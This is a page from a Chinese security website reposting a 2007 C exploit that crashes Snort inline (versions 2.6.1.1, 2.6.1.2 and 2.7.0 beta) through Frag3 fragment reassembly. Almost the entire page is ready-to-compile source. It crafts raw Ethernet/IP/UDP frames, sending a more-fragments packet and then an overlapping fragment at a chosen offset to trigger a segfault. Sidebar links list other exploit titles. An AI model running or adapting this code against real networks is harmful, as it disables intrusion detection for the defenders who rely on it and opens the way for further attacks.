首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Snort 2.6.1.1/2.6.1.2/2.7.0 (fragementation) Remote DoS Exploit 来源：antimatter@gmail.com 作者：Antimatt3r 发布时间：2007-03-09   /********************************************************* * DOS Snort Inline * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled * Antimatt3r * antimatter@gmail.com * Offset needs to be supplied that would cause reassembly for different snort * fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset * will trigger the segfault. ********************************************************/ #include <stdio.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> #include <net/if.h> #include <net/ethernet.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/ioctl.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/udp.h> #include <netinet/ip.h> #include <netinet/if_ether.h> #include <netpacket/packet.h> #define NOOP_FRAG_SLED 576 #define NOOP_SHORT 16 struct addr {   uint32_t ip;   char mac[ETH_ALEN]; }; struct dev {   uint32_t index;   char name[IFNAMSIZ]; }; int mac_aton(char *, char *); void usage(char *cmd) {   fprintf(stderr, "usage: %s <device> <source_ip>  <src_mac> <dst_ip>  <dst_mac>  <offset>\n", cmd); } int mac_aton(char *amac, char *nmac) {   char c;   int i;   unsigned int val;   i = 0;   while ((*amac != '\0') && (i < ETH_ALEN)) {     val = 0;     c = *amac++;     if (c >= '0' && c <= '9') {       val = c - '0';     }     else if (c >= 'a' && c <= 'f') {       val = c - 'a' + 10;     }     else if (c >= 'A' && c <= 'F') {       val = c - 'A' + 10;     }     else {       errno = EINVAL;       return -1;     }     val <<= 4;     c = *amac;     if (c >= '0' && c <= '9') {       val |= c - '0';     }     else if (c >= 'a' && c <= 'f') {       val |= c - 'a' + 10;     }     else if (c >= 'A' && c <= 'F') {       val |= c - 'A' + 10;     }     else if (c == ':' || c == '\0') {       val >>= 4;     }     else {       errno = EINVAL;       return -1;     }     if (c != 0) {       amac++;     }     *nmac++ = val & 0xff;     i++;     /* We might get a semicolon here - not required. */     if (*amac == ':') {       amac++;     }   }   return 0; } int in_cksum(u_short *addr, int len) { int nleft = len; u_short *w = addr; int sum = 0; u_short answer = 0;   while (nleft > 1) {     sum += *w++;     nleft -= 2;   }   if (nleft == 1) {     *(u_char *)(&answer) = *(u_char *)w;     sum += answer;   }   sum = (sum >> 16) + (sum & 0xffff);   sum += (sum >> 16);   answer = ~sum;   return answer; } int send_morefrag_packet(int sock, struct dev *dev, struct addr *src, struct addr *dst) {   struct sockaddr_ll sll;   struct ether_header *eth;   struct iphdr *ip;   struct udphdr *udp;   u_char *payload;   char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_FRAG_SLED];   memset(&sll, 0, sizeof(sll));   sll.sll_family = PF_PACKET;   sll.sll_ifindex = dev->index;   sll.sll_halen = ETH_ALEN;   memcpy(&sll.sll_addr, dst->mac, ETH_ALEN);   memset(buf, 0, sizeof(buf));   eth = (struct ether_header *)buf;   ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header));   udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr));   payload = (u_char *)((char *)udp + sizeof(struct udphdr));   memset(payload,'\x90',NOOP_FRAG_SLED);   udp->source = htons(1111);   udp->dest = htons(1111);   udp->len =  htons(sizeof(struct udphdr) + NOOP_FRAG_SLED) ;   udp->check =0;   ip->version = 4;   ip->ihl = 5;   ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_FRAG_SLED);   ip->id = 31337;   ip->ttl = 64;   ip->frag_off = htons(0x2000);   ip->protocol = IPPROTO_UDP;   ip->saddr = src->ip;   ip->daddr = dst->ip;   ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));     memcpy(eth->ether_shost, src->mac, ETH_ALEN);   memcpy(eth->ether_dhost, dst->mac, ETH_ALEN);   eth->ether_type = htons(ETH_P_IP);   if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) printf ("error %d %s\n",errno,strerror(errno));   else printf("MF Packet Sent\n"); } int send_overlap_packet(int sock, struct dev *dev, struct addr *src, struct addr *dst,int offset) {   struct sockaddr_ll sll;   struct ether_header *eth;   struct iphdr *ip;   struct udphdr *udp;   u_char *payload;   char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_SHORT ];   memset(&sll, 0, sizeof(sll));   sll.sll_family = PF_PACKET;   sll.sll_ifindex = dev->index;   sll.sll_halen = ETH_ALEN;   memcpy(&sll.sll_addr, dst->mac, ETH_ALEN);   memset(buf, 0, sizeof(buf));   eth = (struct ether_header *)buf;   ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header));   udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr));   payload = (u_char *)((char *)udp + sizeof(struct udphdr));   memset(payload,'\x90',NOOP_SHORT);   udp->source = htons(1111);   udp->dest = htons(1111);   udp->len =  htons(sizeof(struct udphdr) + NOOP_SHORT) ;   udp->check =0;   ip->version = 4;   ip->ihl = 5;   ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_SHORT);   ip->id = 31337;   ip->frag_off = ntohs(offset);   ip->ttl = 64;   ip->protocol = IPPROTO_UDP;   ip->saddr = src->ip;   ip->daddr = dst->ip;   ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));     memcpy(eth->ether_shost, src->mac, ETH_ALEN);   memcpy(eth->ether_dhost, dst->mac, ETH_ALEN);   eth->ether_type = htons(ETH_P_IP);   if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) printf ("error %d %s\n",errno,strerror(errno));   else printf("2nd Packet Sent\n"); } int main(int argc, char *argv[]) {   int sock = 0;   struct dev dev;   struct addr src, dst;   int offset; //play with varying offsets   if (argc < 7) {     usage(argv[0]);     return -1;   }   memset(&dev, 0, sizeof(dev));   strncpy(dev.name, argv[1], IFNAMSIZ-1);   if((dev.index = if_nametoindex(dev.name)) == 0) {     perror(argv[1]);     exit(-1);   }   memset(&src, 0, sizeof(src));   if (inet_aton(argv[2], (struct in_addr *)&src.ip) == 0) {     fprintf(stderr, "%s: invalid src ip address\n", argv[2]);     exit(-1);   }   if (mac_aton(argv[3], src.mac) < 0) {     fprintf(stderr, "%s: invalid src hardware address\r\n", argv[3]);     exit(-1);   }   memset(&dst, 0, sizeof(dst));   if (inet_aton(argv[4], (struct in_addr *)&dst.ip) == 0) {     fprintf(stderr, "%s: invalid ip address\r\n", argv[2]);     exit(-1);   }   if (mac_aton(argv[5], dst.mac) < 0) {     fprintf(stderr, "%s: invalid hardware address\r\n", argv[3]);     exit(-1);   }   offset = atoi(argv[6]);   if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {      perror("socket");      exit(-1);   }   if (send_morefrag_packet(sock, &dev, &src, &dst) < 0) {     perror("send error ");     exit(-1);   }     if (send_overlap_packet(sock, &dev, &src, &dst,offset) < 0) {     perror("send error");     exit(-1);   }   close(sock);   return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Rediff Toolbar ActiveX Control ·TFTPDWIN Server 0.4.2 (UDP) De ·PHP 4.4.6 crack_opendict() Loc ·Adobe Reader plug-in AcroPDF.d ·NukeSentinel <= 2.5.06 (mysql ·PHP COM extensions (inconsiste ·SonicMailer Pro <= 3.2.3 (inde ·PHP < 4.4.5 / 5.2.1 (shmop) SS ·Top Auction 1.0 (viewcat.php) ·PHP < 4.4.5 / 5.2.1 (shmop Fun ·JobSitePro 1.0 (search.php) Re ·PHP <= 5.2.1 substr_compare()   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved